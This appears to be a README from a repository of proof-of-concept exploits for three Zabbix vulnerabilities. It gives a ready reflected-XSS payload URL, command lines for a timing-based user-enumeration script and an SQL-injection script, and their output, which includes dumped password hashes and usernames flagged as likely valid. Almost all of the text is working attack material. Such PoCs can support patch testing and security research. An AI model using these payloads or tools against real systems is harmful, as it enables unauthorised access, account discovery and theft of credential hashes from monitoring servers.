-
[CVE-2024-45699 - Zabbix Authenticated Reflected XSS in backurl parameter]
└── PoC:
http://<target>:8080/zabbix.php?action=export.valuemaps&format=json&backurl=javascript%3Aalert(document.location) -
[CVE-2024-36469 - Zabbix User Enumeration via Timing Attack]
└── PoC:CVE-2024-36469.py -
[CVE-2024-36465 - Zabbix SQL Injection via groupBy parameter]
A low privilege (regular) Zabbix user with API access can use SQL injection vulnerability ininclude/classes/api/CApiService.phpto execute arbitrary SQL commands via thegroupByparameter.
My comment: Although it states that a low privilege user is required, during testing the account needs to be in the "Zabbix administrators" group or equivalent for the test to work.
└── PoC:CVE-2024-36465.py
CVE-2024-36465
% python3 CVE-2024-36465.py -u Admin -p zabbix --url http://192.168.1.178:8080
Auth token: e9b99463...
Using API URL: http://192.168.1.178:8080/api_jsonrpc.php
Version: 8.0.42
Current DB user: zabbix@192.168.97.4
Current DB: zabbix
Schemas: information_schema, performance_schema, zabbix
Row 0: Zabbix | $2y$10$92nDno4n...1UrEK
Row 1: | $2y$10$89otZrR...7G06
Row 2: test1 | $2y$10$LArpT9d...X0Ry
Row 3: | $2y$10$RESfC8Y...SxIC
Row 4: | $2y$10$eKkmbgy...4PjWCVE-2024-36469
% python3 CVE-2024-36469.py -U /tmp/users.txt --url http://localhost:8080/ -m 2
[+] Checking http://localhost:8080/index.php for Zabbix interface...
[+] Likely Zabbix login page detected.
[+] Querying Zabbix API version from http://localhost:8080/api_jsonrpc.php...
[+] Confirmed Zabbix server version: 7.0.4
[+] Starting tests on userlist from line 0...
[INVALID] Username: test0 | Time: 0.0152s | Threshold: 0.0485s
[LIKELY VALID] Username: Admin | Time: 0.1368s | Threshold: 0.0485s
[INVALID] Username: test1 | Time: 0.0411s | Threshold: 0.0485s
[INVALID] Username: test2 | Time: 0.0334s | Threshold: 0.0485s
[LIKELY VALID] Username: guest | Time: 0.1320s | Threshold: 0.0485sCVE-2024-45699
